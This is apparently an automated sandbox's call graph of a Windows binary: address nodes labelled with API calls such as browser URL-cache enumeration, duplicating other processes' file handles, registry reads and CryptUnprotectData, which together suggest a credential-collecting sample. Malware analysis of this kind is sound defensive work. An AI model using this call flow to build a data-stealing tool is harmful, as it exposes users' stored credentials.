38561->38562 38563 409d1f 6 API calls 38562->38563 38564 40890e 38563->38564 38575 408953 38575->38306 38595 40b633 free 38594->38595 38596 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38595->38596 38597 413f00 Process32NextW 38596->38597 38598 413da5 OpenProcess 38597->38598 38599 413f17 CloseHandle 38597->38599 38600 413df3 memset 38598->38600 38603 413eb0 38598->38603 38599->38341 39742 413f27 38600->39742 38602 413ebf free 38602->38603 38603->38597 38603->38602 38604 4099f4 3 API calls 38603->38604 38604->38603 38606 413e37 GetModuleHandleW 38607 413e46 GetProcAddress 38606->38607 38608 413e1f 38606->38608 38607->38608 38608->38606 39747 413959 38608->39747 39763 413ca4 38608->39763 38610 413ea2 CloseHandle 38610->38603 38612 414c2e 17 API calls 38611->38612 38613 403eb7 38612->38613 38614 414c2e 17 API calls 38613->38614 38615 403ec5 38614->38615 38616 409d1f 6 API calls 38615->38616 38617 403ee2 38616->38617 38618 409d1f 6 API calls 38617->38618 38619 403efd 38618->38619 38620 409d1f 6 API calls 38619->38620 38621 403f15 38620->38621 38622 403af5 20 API calls 38621->38622 38623 403f29 38622->38623 38624 403af5 20 API calls 38623->38624 38625 403f3a 38624->38625 38626 40414f 33 API calls 38625->38626 38632 403f4f 38626->38632 38627 403faf 39777 40b1ab free free 38627->39777 38628 403f5b memset 38628->38632 38630 403fb7 38630->38250 38631 4099c6 2 API calls 38631->38632 38632->38627 38632->38628 38632->38631 38633 40a8ab 9 API calls 38632->38633 38633->38632 38635 414c2e 17 API calls 38634->38635 38636 403d26 38635->38636 38637 414c2e 17 API calls 38636->38637 38638 403d34 38637->38638 38639 409d1f 6 API calls 38638->38639 38640 403d51 38639->38640 38641 409d1f 6 API calls 38640->38641 38642 403d6c 38641->38642 38643 409d1f 6 API calls 38642->38643 38644 403d84 38643->38644 38645 403af5 20 API calls 38644->38645 38646 403d98 38645->38646 38647 403af5 20 API calls 38646->38647 38648 403da9 38647->38648 38649 40414f 33 API calls 38648->38649 38655 403dbe 38649->38655 38650 403e1e 39778 40b1ab free free 38650->39778 38651 403dca memset 38651->38655 38653 403e26 38653->38257 38654 4099c6 2 API calls 38654->38655 38655->38650 38655->38651 38655->38654 38656 40a8ab 9 API calls 38655->38656 38656->38655 38658 414b81 9 API calls 38657->38658 38659 414c40 38658->38659 38660 414c73 memset 38659->38660 39779 409cea 38659->39779 38661 414c94 38660->38661 39782 414592 RegOpenKeyExW 38661->39782 38663 414c64 SHGetSpecialFolderPathW 38666 414d0b 38663->38666 38666->38274 38667 414cc1 38668 414cf4 wcscpy 38667->38668 39783 414bb0 wcscpy 38667->39783 38668->38666 38670 414cd2 39784 4145ac RegQueryValueExW 38670->39784 38672 414ce9 RegCloseKey 38672->38668 38674 409d62 38673->38674 38675 409d43 wcscpy 38673->38675 38674->38316 38676 409719 2 API calls 38675->38676 38677 409d51 wcscat 38676->38677 38677->38674 38679 40aebe FindClose 38678->38679 38680 40ae21 38679->38680 38681 4099c6 2 API calls 38680->38681 38682 40ae35 38681->38682 38683 409d1f 6 API calls 38682->38683 38684 40ae49 38683->38684 38684->38382 38686 40ade0 38685->38686 38687 40ae0f 38685->38687 38686->38687 38688 40ade7 wcscmp 38686->38688 38687->38382 38688->38687 38689 40adfe wcscmp 38688->38689 38689->38687 38691 40ae18 9 API calls 38690->38691 38697 4453c4 38691->38697 38692 40ae51 9 API calls 38692->38697 38693 4453f3 38694 40aebe FindClose 38693->38694 38696 4453fe 38694->38696 38695 40add4 2 API calls 38695->38697 38696->38382 38697->38692 38697->38693 38697->38695 38698 445403 254 API calls 38697->38698 38698->38697 38700 40ae7b FindNextFileW 38699->38700 38701 40ae5c FindFirstFileW 38699->38701 38702 40ae94 38700->38702 38703 40ae8f 38700->38703 38701->38702 38704 409d1f 6 API calls 38702->38704 38706 40aeb6 38702->38706 38705 40aebe FindClose 38703->38705 38704->38706 38705->38702 38706->38382 38707->38266 38708->38282 38709->38339 38710->38327 38711->38327 38712->38355 38714 409c89 38713->38714 38714->38378 38715->38409 38717 413d39 38716->38717 38718 413d2f FreeLibrary 38716->38718 38719 40b633 free 38717->38719 38718->38717 38720 413d42 38719->38720 38721 40b633 free 38720->38721 38722 413d4a 38721->38722 38722->38236 38723->38244 38724->38285 38725->38299 38727 44db70 38726->38727 38728 40b6fc memset 38727->38728 38729 409c70 2 API calls 38728->38729 38730 40b732 wcsrchr 38729->38730 38731 40b743 38730->38731 38732 40b746 memset 38730->38732 38731->38732 38733 40b2cc 27 API calls 38732->38733 38734 40b76f 38733->38734 38735 409d1f 6 API calls 38734->38735 38736 40b783 38735->38736 39785 409b98 GetFileAttributesW 38736->39785 38738 40b792 38739 40b7c2 38738->38739 38741 409c70 2 API calls 38738->38741 39786 40bb98 38739->39786 38743 40b7a5 38741->38743 38746 40b2cc 27 API calls 38743->38746 38744 40b837 CloseHandle 38748 40b83e memset 38744->38748 38745 40b817 38747 409a45 3 API calls 38745->38747 38749 40b7b2 38746->38749 38751 40b827 CopyFileW 38747->38751 39819 40a6e6 WideCharToMultiByte 38748->39819 38750 409d1f 6 API calls 38749->38750 38750->38739 38751->38748 38753 40b866 38754 444432 121 API calls 38753->38754 38755 40b879 38754->38755 38756 40bad5 38755->38756 38759 40b273 27 API calls 38755->38759 38757 40baeb 38756->38757 38758 40bade DeleteFileW 38756->38758 38761 40b04b ??3@YAXPAX 38757->38761 38758->38757 38760 40b89a 38759->38760 38762 438552 134 API calls 38760->38762 38763 40baf3 38761->38763 38764 40b8a4 38762->38764 38763->38309 38765 40bacd 38764->38765 38767 4251c4 137 API calls 38764->38767 38766 443d90 111 API calls 38765->38766 38766->38756 38776 40b8b8 38767->38776 38768 40bac6 39829 424f26 123 API calls 38768->39829 38769 40b8bd memset 39820 425413 17 API calls 38769->39820 38772 425413 17 API calls 38772->38776 38775 40a71b MultiByteToWideChar 38775->38776 38776->38768 38776->38769 38776->38772 38776->38775 38779 40b9b5 memcmp 38776->38779 38780 4099c6 2 API calls 38776->38780 38781 404423 38 API calls 38776->38781 38784 40bb3e memset memcpy 38776->38784 38785 4251c4 137 API calls 38776->38785 38790 40ba5f memcmp 38776->38790 38791 40a734 MultiByteToWideChar 38776->38791 39821 4253ef 16 API calls 38776->39821 39822 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38776->39822 39823 4253af 17 API calls 38776->39823 39824 4253cf 17 API calls 38776->39824 39825 447280 memset 38776->39825 39826 447960 memset memcpy memcpy memcpy 38776->39826 39827 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38776->39827 39828 447920 memcpy memcpy memcpy 38776->39828 38779->38776 38780->38776 38781->38776 39830 40a734 MultiByteToWideChar 38784->39830 38785->38776 38787 40bb88 LocalFree 38787->38776 38790->38776 38791->38776 38792->38312 38794 40aed1 38793->38794 38795 40aec7 FindClose 38793->38795 38794->38368 38795->38794 38797 4099d7 38796->38797 38798 4099da memcpy 38796->38798 38797->38798 38798->38295 38800 40b2cc 27 API calls 38799->38800 38801 44543f 38800->38801 38802 409d1f 6 API calls 38801->38802 38803 44544f 38802->38803 39914 409b98 GetFileAttributesW 38803->39914 38805 445476 38808 40b2cc 27 API calls 38805->38808 38806 44545e 38806->38805 38807 40b6ef 253 API calls 38806->38807 38807->38805 38809 445482 38808->38809 38810 409d1f 6 API calls 38809->38810 38811 445492 38810->38811 39915 409b98 GetFileAttributesW 38811->39915 38813 4454a1 38814 4454b9 38813->38814 38815 40b6ef 253 API calls 38813->38815 38814->38325 38815->38814 38816->38323 38817->38343 38818->38351 38819->38390 38820->38371 38821->38417 38822->38417 38823->38399 38824->38428 38825->38430 38826->38432 38828 414c2e 17 API calls 38827->38828 38829 40c2ae 38828->38829 38899 40c1d3 38829->38899 38834 40c3be 38851 40a8ab 38834->38851 38835 40afcf 2 API calls 38836 40c2fd FindFirstUrlCacheEntryW 38835->38836 38837 40c3b6 38836->38837 38838 40c31e wcschr 38836->38838 38839 40b04b ??3@YAXPAX 38837->38839 38840 40c331 38838->38840 38841 40c35e FindNextUrlCacheEntryW 38838->38841 38839->38834 38843 40a8ab 9 API calls 38840->38843 38841->38838 38842 40c373 GetLastError 38841->38842 38844 40c3ad FindCloseUrlCache 38842->38844 38845 40c37e 38842->38845 38846 40c33e wcschr 38843->38846 38844->38837 38847 40afcf 2 API calls 38845->38847 38846->38841 38848 40c34f 38846->38848 38849 40c391 FindNextUrlCacheEntryW 38847->38849 38850 40a8ab 9 API calls 38848->38850 38849->38838 38849->38844 38850->38841 39089 40a97a 38851->39089 38854 40a8cc 38854->38439 38855 40a8d0 7 API calls 38855->38854 39094 40b1ab free free 38856->39094 38858 40c3dd 38859 40b2cc 27 API calls 38858->38859 38860 40c3e7 38859->38860 39095 414592 RegOpenKeyExW 38860->39095 38862 40c3f4 38863 40c50e 38862->38863 38864 40c3ff 38862->38864 38878 405337 38863->38878 38865 40a9ce 4 API calls 38864->38865 38866 40c418 memset 38865->38866 39096 40aa1d 38866->39096 38869 40c471 38871 40c47a _wcsupr 38869->38871 38870 40c505 RegCloseKey 38870->38863 38872 40a8d0 7 API calls 38871->38872 38873 40c498 38872->38873 38874 40a8d0 7 API calls 38873->38874 38875 40c4ac memset 38874->38875 38876 40aa1d 38875->38876 38877 40c4e4 RegEnumValueW 38876->38877 38877->38870 38877->38871 39098 405220 38878->39098 38882 4099c6 2 API calls 38881->38882 38883 40a714 _wcslwr 38882->38883 38884 40c634 38883->38884 39155 405361 38884->39155 38887 40c65c wcslen 39158 4053b6 39 API calls 38887->39158 38888 40c71d wcslen 38888->38453 38890 40c677 38891 40c713 38890->38891 39159 40538b 39 API calls 38890->39159 39161 4053df 39 API calls 38891->39161 38894 40c6a5 38894->38891 38895 40c6a9 memset 38894->38895 38896 40c6d3 38895->38896 39160 40c589 44 API calls 38896->39160 38898->38446 38900 40ae18 9 API calls 38899->38900 38906 40c210 38900->38906 38901 40ae51 9 API calls 38901->38906 38902 40c264 38903 40aebe FindClose 38902->38903 38905 40c26f 38903->38905 38904 40add4 2 API calls 38904->38906 38911 40e5ed memset memset 38905->38911 38906->38901 38906->38902 38906->38904 38907 40c231 _wcsicmp 38906->38907 38908 40c1d3 35 API calls 38906->38908 38907->38906 38909 40c248 38907->38909 38908->38906 38924 40c084 22 API calls 38909->38924 38912 414c2e 17 API calls 38911->38912 38913 40e63f 38912->38913 38914 409d1f 6 API calls 38913->38914 38915 40e658 38914->38915 38925 409b98 GetFileAttributesW 38915->38925 38917 40e667 38918 40e680 38917->38918 38919 409d1f 6 API calls 38917->38919 38926 409b98 GetFileAttributesW 38918->38926 38919->38918 38921 40e68f 38922 40c2d8 38921->38922 38927 40e4b2 38921->38927 38922->38834 38922->38835 38924->38906 38925->38917 38926->38921 38948 40e01e 38927->38948 38929 40e593 38930 40e5b0 38929->38930 38931 40e59c DeleteFileW 38929->38931 38933 40b04b ??3@YAXPAX 38930->38933 38931->38930 38932 40e521 38932->38929 38971 40e175 38932->38971 38934 40e5bb 38933->38934 38936 40e5c4 CloseHandle 38934->38936 38937 40e5cc 38934->38937 38936->38937 38939 40b633 free 38937->38939 38938 40e573 38941 40e584 38938->38941 38942 40e57c CloseHandle 38938->38942 38940 40e5db 38939->38940 38944 40b633 free 38940->38944 39014 40b1ab free free 38941->39014 38942->38941 38943 40e540 38943->38938 38991 40e2ab 38943->38991 38946 40e5e3 38944->38946 38946->38922 39015 406214 38948->39015 38951 40e16b 38951->38932 38954 40afcf 2 API calls 38955 40e08d OpenProcess 38954->38955 38956 40e0a4 GetCurrentProcess DuplicateHandle 38955->38956 38960 40e152 38955->38960 38957 40e0d0 GetFileSize 38956->38957 38958 40e14a CloseHandle 38956->38958 39052 409a45 GetTempPathW 38957->39052 38958->38960 38959 40e160 38963 40b04b ??3@YAXPAX 38959->38963 38960->38959 38962 406214 22 API calls 38960->38962 38962->38959 38963->38951 38964 40e0ea 39055 4096dc CreateFileW 38964->39055 38966 40e0f1 CreateFileMappingW 38967 40e140 CloseHandle CloseHandle 38966->38967 38968 40e10b MapViewOfFile 38966->38968 38967->38958 38969 40e13b CloseHandle 38968->38969 38970 40e11f WriteFile UnmapViewOfFile 38968->38970 38969->38967 38970->38969 38972 40e18c 38971->38972 39056 406b90 38972->39056 38975 40e1a7 memset 38981 40e1e8 38975->38981 38976 40e299 39066 4069a3 38976->39066 38982 40e283 38981->38982 38983 40dd50 _wcsicmp 38981->38983 38989 40e244 _snwprintf 38981->38989 39073 406e8f 13 API calls 38981->39073 39074 40742e 8 API calls 38981->39074 39075 40aae3 wcslen wcslen _memicmp 38981->39075 39076 406b53 SetFilePointerEx ReadFile 38981->39076 38984 40e291 38982->38984 38985 40e288 free 38982->38985 38983->38981 38986 40aa04 free 38984->38986 38985->38984 38986->38976 38990 40a8d0 7 API calls 38989->38990 38990->38981 38992 40e2c2 38991->38992 38993 406b90 11 API calls 38992->38993 39013 40e2d3 38993->39013 38994 40e4a0 38995 4069a3 2 API calls 38994->38995 38997 40e4ab 38995->38997 38997->38943 38999 40e489 39000 40aa04 free 38999->39000 39001 40e491 39000->39001 39001->38994 39002 40e497 free 39001->39002 39002->38994 39003 40dd50 _wcsicmp 39003->39013 39005 40e376 memset 39079 40aa29 39005->39079 39008 40e3e0 memcpy 39008->39013 39009 40e3fb memcpy 39009->39013 39010 40e3b3 wcschr 39010->39013 39011 40e416 memcpy 39011->39013 39012 40e431 memcpy 39012->39013 39013->38994 39013->38999 39013->39003 39013->39008 39013->39009 39013->39010 39013->39011 39013->39012 39077 406e8f 13 API calls 39013->39077 39078 40dd50 _wcsicmp 39013->39078 39087 40742e 8 API calls 39013->39087 39088 406b53 SetFilePointerEx ReadFile 39013->39088 39014->38929 39016 406294 CloseHandle 39015->39016 39017 406224 39016->39017 39018 4096c3 CreateFileW 39017->39018 39019 40622d 39018->39019 39020 406281 GetLastError 39019->39020 39021 40a2ef ReadFile 39019->39021 39025 40625a 39020->39025 39022 406244 39021->39022 39022->39020 39023 40624b 39022->39023 39024 406777 19 API calls 39023->39024 39023->39025 39024->39025 39025->38951 39026 40dd85 memset 39025->39026 39027 409bca GetModuleFileNameW 39026->39027 39028 40ddbe CreateFileW 39027->39028 39032 40ddf1 39028->39032 39029 40afcf ??2@YAPAXI ??3@YAXPAX 39029->39032 39030 41352f 9 API calls 39030->39032 39031 40de0b NtQuerySystemInformation 39031->39032 39032->39029 39032->39030 39032->39031 39033 40de3b CloseHandle GetCurrentProcessId 39032->39033 39034 40de54 39033->39034 39035 413d4c 46 API calls 39034->39035 39044 40de88 39035->39044 39036 40e00c 39037 413d29 free FreeLibrary 39036->39037 39038 40e014 39037->39038 39038->38951 39038->38954 39039 40dea9 _wcsicmp 39040 40dee7 OpenProcess 39039->39040 39041 40debd _wcsicmp 39039->39041 39040->39044 39041->39040 39042 40ded0 _wcsicmp 39041->39042 39042->39040 39042->39044 39043 40dfef CloseHandle 39043->39044 39044->39036 39044->39039 39044->39043 39045 40df23 GetCurrentProcess DuplicateHandle 39044->39045 39046 40df78 39044->39046 39045->39044 39047 40df4c memset 39045->39047 39046->39043 39050 40df8f CloseHandle 39046->39050 39051 40dfae _wcsicmp 39046->39051 39048 41352f 9 API calls 39047->39048 39049 40df6f 39048->39049 39049->39046 39049->39050 39050->39046 39051->39044 39051->39046 39053 409a74 GetTempFileNameW 39052->39053 39054 409a66 GetWindowsDirectoryW 39052->39054 39053->38964 39054->39053 39055->38966 39058 406bd5 39056->39058 39059 406bad 39056->39059 39057 406bba _wcsicmp 39057->39058 39057->39059 39060 4066bf free malloc memcpy free free 39058->39060 39065 406c0f 39058->39065 39059->39057 39059->39058 39061 406be5 39060->39061 39062 40afcf ??2@YAPAXI ??3@YAXPAX 39061->39062 39061->39065 39063 406bff 39062->39063 39064 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39063->39064 39064->39065 39065->38975 39065->38976 39067 4069c4 ??3@YAXPAX 39066->39067 39068 4069af 39067->39068 39069 40b633 free 39068->39069 39070 4069ba 39069->39070 39071 40b04b ??3@YAXPAX 39070->39071 39072 4069c2 39071->39072 39072->38943 39073->38981 39074->38981 39075->38981 39076->38981 39077->39013 39078->39005 39080 40aa33 39079->39080 39086 40aa63 39079->39086 39081 40aa44 39080->39081 39082 40aa38 wcslen 39080->39082 39083 40a9ce malloc memcpy free free 39081->39083 39082->39081 39084 40aa4d 39083->39084 39085 40aa51 memcpy 39084->39085 39084->39086 39085->39086 39086->39013 39087->39013 39088->39013 39091 40a980 39089->39091 39090 40a8bb 39090->38854 39090->38855 39091->39090 39092 40a995 _wcsicmp 39091->39092 39093 40a99c wcscmp 39091->39093 39092->39091 39093->39091 39094->38858 39095->38862 39097 40aa23 RegEnumValueW 39096->39097 39097->38869 39097->38870 39099 405335 39098->39099 39100 40522a 39098->39100 39099->38453 39101 40b2cc 27 API calls 39100->39101 39102 405234 39101->39102 39103 40a804 8 API calls 39102->39103 39104 40523a 39103->39104 39143 40b273 39104->39143 39106 405248 _mbscpy _mbscat GetProcAddress 39107 40b273 27 API calls 39106->39107 39108 405279 39107->39108 39146 405211 GetProcAddress 39108->39146 39110 405282 39111 40b273 27 API calls 39110->39111 39112 40528f 39111->39112 39147 405211 GetProcAddress 39112->39147 39114 405298 39115 40b273 27 API calls 39114->39115 39116 4052a5 39115->39116 39148 405211 GetProcAddress 39116->39148 39118 4052ae 39119 40b273 27 API calls 39118->39119 39120 4052bb 39119->39120 39149 405211 GetProcAddress 39120->39149 39122 4052c4 39123 40b273 27 API calls 39122->39123 39124 4052d1 39123->39124 39150 405211 GetProcAddress 39124->39150 39126 4052da 39127 40b273 27 API calls 39126->39127 39128 4052e7 39127->39128 39151 405211 GetProcAddress 39128->39151 39130 4052f0 39131 40b273 27 API calls 39130->39131 39132 4052fd 39131->39132 39152 405211 GetProcAddress 39132->39152 39134 405306 39135 40b273 27 API calls 39134->39135 39136 405313 39135->39136 39153 405211 GetProcAddress 39136->39153 39144 40b58d 27 API calls 39143->39144 39145 40b18c 39144->39145 39145->39106 39146->39110 39147->39114 39148->39118 39149->39122 39150->39126 39151->39130 39152->39134 39156 405220 39 API calls 39155->39156 39157 405369 39156->39157 39157->38887 39157->38888 39158->38890 39159->38894 39160->38891 39161->38888 39163 40440c FreeLibrary 39162->39163 39164 40436d 39163->39164 39165 40a804 8 API calls 39164->39165 39166 404377 39165->39166 39167 404383 39166->39167 39168 404405 39166->39168 39169 40b273 27 API calls 39167->39169 39168->38457 39168->38460 39168->38461 39170 40438d GetProcAddress 39169->39170 39171 40b273 27 API calls 39170->39171 39172 4043a7 GetProcAddress 39171->39172 39173 40b273 27 API calls 39172->39173 39174 4043ba GetProcAddress 39173->39174 39175 40b273 27 API calls 39174->39175 39176 4043ce GetProcAddress 39175->39176 39177 40b273 27 API calls 39176->39177 39178 4043e2 GetProcAddress 39177->39178 39179 4043f1 39178->39179 39180 40440c FreeLibrary 39179->39180 39181 4043f7 39179->39181 39180->39168 39181->39168 39183 404413 FreeLibrary 39182->39183 39184 40441e 39182->39184 39183->39184 39184->38476 39185->38473 39187 40447e 39186->39187 39188 40442e 39186->39188 39189 404485 CryptUnprotectData 39187->39189 39190 40449c 39187->39190 39191 40b2cc 27 API calls 39188->39191 39189->39190 39190->38473 39192 404438 39191->39192 39193 40a804 8 API calls 39192->39193 39194 40443e 39193->39194 39195 404445 39194->39195 39196 404467 39194->39196 39197 40b273 27 API calls 39195->39197 39196->39187 39199 404475 FreeLibrary 39196->39199 39198 40444f GetProcAddress 39197->39198 39198->39196 39200 404460 39198->39200 39199->39187 39200->39196 39202 4135f6 39201->39202 39203 4135eb FreeLibrary 39201->39203 39202->38479 39203->39202 39205 4449c4 39204->39205 39206 444a52 39204->39206 39207 40b2cc 27 API calls 39205->39207 39206->38496 39206->38501 39208 4449cb 39207->39208 39209 40a804 8 API calls 39208->39209 39210 4449d1 39209->39210 39211 40b273 27 API calls 39210->39211 39212 4449dc GetProcAddress 39211->39212 39213 40b273 27 API calls 39212->39213 39214 4449f3 GetProcAddress 39213->39214 39215 40b273 27 API calls 39214->39215 39216 444a04 GetProcAddress 39215->39216 39217 40b273 27 API calls 39216->39217 39218 444a15 GetProcAddress 39217->39218 39225->38507 39226->38507 39227->38507 39228->38507 39229->38497 39231 403a29 39230->39231 39245 403bed memset memset 39231->39245 39233 403a2f 39234 403ae7 39233->39234 39235 403a3f memset 39233->39235 39238 409d1f 6 API calls 39233->39238 39239 409b98 GetFileAttributesW 39233->39239 39240 40a8d0 7 API calls 39233->39240 39258 40b1ab free free 39234->39258 39235->39233 39237 403aef 39237->38516 39238->39233 39239->39233 39240->39233 39242 40a051 GetFileTime CloseHandle 39241->39242 39243 4039ca CompareFileTime 39241->39243 39242->39243 39243->38516 39244->38513 39246 414c2e 17 API calls 39245->39246 39247 403c38 39246->39247 39248 409719 2 API calls 39247->39248 39249 403c3f wcscat 39248->39249 39250 414c2e 17 API calls 39249->39250 39251 403c61 39250->39251 39252 409719 2 API calls 39251->39252 39253 403c68 wcscat 39252->39253 39259 403af5 39253->39259 39256 403af5 20 API calls 39257 403c95 39256->39257 39257->39233 39258->39237 39260 403b02 39259->39260 39261 40ae18 9 API calls 39260->39261 39267 403b37 39261->39267 39262 40ae51 9 API calls 39262->39267 39263 403bdb 39265 40aebe FindClose 39263->39265 39264 40add4 wcscmp wcscmp 39264->39267 39266 403be6 39265->39266 39266->39256 39267->39262 39267->39263 39267->39264 39268 40ae18 9 API calls 39267->39268 39269 40aebe FindClose 39267->39269 39270 40a8d0 7 API calls 39267->39270 39268->39267 39269->39267 39270->39267 39272 409d1f 6 API calls 39271->39272 39273 404190 39272->39273 39286 409b98 GetFileAttributesW 39273->39286 39275 40419c 39276 4041a7 6 API calls 39275->39276 39277 40435c 39275->39277 39279 40424f 39276->39279 39277->38541 39279->39277 39280 40425e memset 39279->39280 39282 409d1f 6 API calls 39279->39282 39283 40a8ab 9 API calls 39279->39283 39287 414842 39279->39287 39280->39279 39281 404296 wcscpy 39280->39281 39281->39279 39282->39279 39284 4042b6 memset memset _snwprintf wcscpy 39283->39284 39284->39279 39285->38539 39286->39275 39290 41443e 39287->39290 39289 414866 39289->39279 39291 41444b 39290->39291 39292 414451 39291->39292 39293 4144a3 GetPrivateProfileStringW 39291->39293 39294 414491 39292->39294 39295 414455 wcschr 39292->39295 39293->39289 39297 414495 WritePrivateProfileStringW 39294->39297 39295->39294 39296 414463 _snwprintf 39295->39296 39296->39297 39297->39289 39298->38545 39300 40b2cc 27 API calls 39299->39300 39301 409615 39300->39301 39302 409d1f 6 API calls 39301->39302 39303 409625 39302->39303 39328 409b98 GetFileAttributesW 39303->39328 39305 409634 39306 409648 39305->39306 39329 4091b8 memset 39305->39329 39308 40b2cc 27 API calls 39306->39308 39310 408801 39306->39310 39309 40965d 39308->39309 39311 409d1f 6 API calls 39309->39311 39310->38548 39310->38575 39312 40966d 39311->39312 39381 409b98 GetFileAttributesW 39312->39381 39314 40967c 39314->39310 39315 409681 39314->39315 39382 409529 72 API calls 39315->39382 39317 409690 39317->39310 39328->39305 39383 40a6e6 WideCharToMultiByte 39329->39383 39331 409202 39384 444432 39331->39384 39334 40b273 27 API calls 39335 409236 39334->39335 39430 438552 39335->39430 39361 40951d 39361->39306 39381->39314 39382->39317 39383->39331 39480 4438b5 39384->39480 39386 44444c 39387 409215 39386->39387 39494 415a6d 39386->39494 39387->39334 39387->39361 39389 4442e6 11 API calls 39390 44469e 39389->39390 39390->39387 39393 443d90 111 API calls 39390->39393 39391 444486 39392 4444b9 memcpy 39391->39392 39400 4444a4 39391->39400 39498 415258 39392->39498 39393->39387 39395 444524 39396 444541 39395->39396 39397 44452a 39395->39397 39501 444316 39396->39501 39398 416935 16 API calls 39397->39398 39398->39400 39400->39389 39619 438460 39430->39619 39481 4438d0 39480->39481 39490 4438c9 39480->39490 39568 415378 memcpy memcpy 39481->39568 39490->39386 39495 415a77 39494->39495 39496 415a8d 39495->39496 39497 415a7e memset 39495->39497 39496->39391 39497->39496 39499 4438b5 11 API calls 39498->39499 39500 41525d 39499->39500 39500->39395 39502 444328 39501->39502 39631 41703f 39619->39631 39621 43847a 39622 43848a 39621->39622 39623 43847e 39621->39623 39638 438270 39622->39638 39668 4446ea 11 API calls 39623->39668 39627 438488 39632 417044 39631->39632 39633 41705c 39631->39633 39635 416760 11 API calls 39632->39635 39637 417055 39632->39637 39634 417075 39633->39634 39636 41707a 11 API calls 39633->39636 39634->39621 39635->39637 39636->39632 39637->39621 39639 415a91 memset 39638->39639 39668->39627 39769 413f4f 39742->39769 39745 413f37 K32GetModuleFileNameExW 39746 413f4a 39745->39746 39746->38608 39748 413969 wcscpy 39747->39748 39749 41396c wcschr 39747->39749 39761 413a3a 39748->39761 39749->39748 39751 41398e 39749->39751 39774 4097f7 wcslen wcslen _memicmp 39751->39774 39753 41399a 39754 4139a4 memset 39753->39754 39755 4139e6 39753->39755 39775 409dd5 GetWindowsDirectoryW wcscpy 39754->39775 39757 413a31 wcscpy 39755->39757 39758 4139ec memset 39755->39758 39757->39761 39776 409dd5 GetWindowsDirectoryW wcscpy 39758->39776 39759 4139c9 wcscpy wcscat 39759->39761 39761->38608 39762 413a11 memcpy wcscat 39762->39761 39764 413cb0 GetModuleHandleW 39763->39764 39765 413cda 39763->39765 39764->39765 39766 413cbf GetProcAddress 39764->39766 39767 413ce3 GetProcessTimes 39765->39767 39768 413cf6 39765->39768 39766->39765 39767->38610 39768->38610 39770 413f2f 39769->39770 39771 413f54 39769->39771 39770->39745 39770->39746 39772 40a804 8 API calls 39771->39772 39773 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39772->39773 39773->39770 39774->39753 39775->39759 39776->39762 39777->38630 39778->38653 39780 409cf9 GetVersionExW 39779->39780 39781 409d0a 39779->39781 39780->39781 39781->38660 39781->38663 39782->38667 39783->38670 39784->38672 39785->38738 39787 40bba5 39786->39787 39831 40cc26 39787->39831 39790 40bd4b 39852 40cc0c 39790->39852 39795 40b2cc 27 API calls 39796 40bbef 39795->39796 39859 40ccf0 _wcsicmp 39796->39859 39798 40bbf5 39798->39790 39860 40ccb4 6 API calls 39798->39860 39800 40bc26 39801 40cf04 17 API calls 39800->39801 39802 40bc2e 39801->39802 39803 40bd43 39802->39803 39804 40b2cc 27 API calls 39802->39804 39805 40cc0c 4 API calls 39803->39805 39806 40bc40 39804->39806 39805->39790 39861 40ccf0 _wcsicmp 39806->39861 39808 40bc46 39808->39803 39809 40bc61 memset memset WideCharToMultiByte 39808->39809 39862 40103c strlen 39809->39862 39811 40bcc0 39812 40b273 27 API calls 39811->39812 39813 40bcd0 memcmp 39812->39813 39813->39803 39814 40bce2 39813->39814 39815 404423 38 API calls 39814->39815 39816 40bd10 39815->39816 39816->39803 39817 40bd3a LocalFree 39816->39817 39818 40bd1f memcpy 39816->39818 39817->39803 39818->39817 39819->38753 39820->38776 39821->38776 39822->38776 39823->38776 39824->38776 39825->38776 39826->38776 39827->38776 39828->38776 39829->38765 39830->38787 39863 4096c3 CreateFileW 39831->39863 39833 40cc34 39834 40cc3d GetFileSize 39833->39834 39842 40bbca 39833->39842 39835 40afcf 2 API calls 39834->39835 39836 40cc64 39835->39836 39864 40a2ef ReadFile 39836->39864 39838 40cc71 39865 40ab4a MultiByteToWideChar 39838->39865 39840 40cc95 CloseHandle 39841 40b04b ??3@YAXPAX 39840->39841 39841->39842 39842->39790 39843 40cf04 39842->39843 39844 40b633 free 39843->39844 39845 40cf14 39844->39845 39871 40b1ab free free 39845->39871 39847 40bbdd 39847->39790 39847->39795 39848 40cf1b 39848->39847 39850 40cfef 39848->39850 39872 40cd4b 39848->39872 39851 40cd4b 14 API calls 39850->39851 39851->39847 39853 40b633 free 39852->39853 39854 40cc15 39853->39854 39855 40aa04 free 39854->39855 39856 40cc1d 39855->39856 39913 40b1ab free free 39856->39913 39858 40b7d4 memset CreateFileW 39858->38744 39858->38745 39859->39798 39860->39800 39861->39808 39862->39811 39863->39833 39864->39838 39866 40ab6b 39865->39866 39870 40ab93 39865->39870 39867 40a9ce 4 API calls 39866->39867 39868 40ab74 39867->39868 39869 40ab7c MultiByteToWideChar 39868->39869 39869->39870 39870->39840 39871->39848 39873 40cd7b 39872->39873 39874 40aa29 6 API calls 39873->39874 39876 40cd89 39874->39876 39875 40cef5 39877 40aa04 free 39875->39877 39876->39875 39879 40aa29 6 API calls 39876->39879 39878 40cefd 39877->39878 39878->39848 39880 40ce1d 39879->39880 39881 40aa29 6 API calls 39880->39881 39882 40ce3e 39881->39882 39883 40ce6a 39882->39883 39906 40abb7 wcslen memmove 39882->39906 39884 40ce9f 39883->39884 39909 40abb7 wcslen memmove 39883->39909 39886 40a8d0 7 API calls 39884->39886 39889 40ceb5 39886->39889 39887 40ce56 39907 40aa71 wcslen 39887->39907 39895 40a8d0 7 API calls 39889->39895 39891 40ce8b 39910 40aa71 wcslen 39891->39910 39892 40ce5e 39908 40abb7 wcslen memmove 39892->39908 39898 40cecb 39895->39898 39896 40ce93 39911 40abb7 wcslen memmove 39896->39911 39912 40d00b malloc memcpy free free 39898->39912 39900 40cedd 39901 40aa04 free 39900->39901 39902 40cee5 39901->39902 39903 40aa04 free 39902->39903 39904 40ceed 39903->39904 39905 40aa04 free 39904->39905 39905->39875 39906->39887 39907->39892 39908->39883 39909->39891 39910->39896 39911->39884 39912->39900 39913->39858 39914->38806 39915->38813 39916 4147f3 39919 414561 39916->39919 39918 414813 39920 41456d 39919->39920 39921 41457f GetPrivateProfileIntW 39919->39921 39924 4143f1 memset _itow WritePrivateProfileStringW 39920->39924 39921->39918 39923 41457a 39923->39918 39924->39923 39925 44def7 39926 44df07 39925->39926 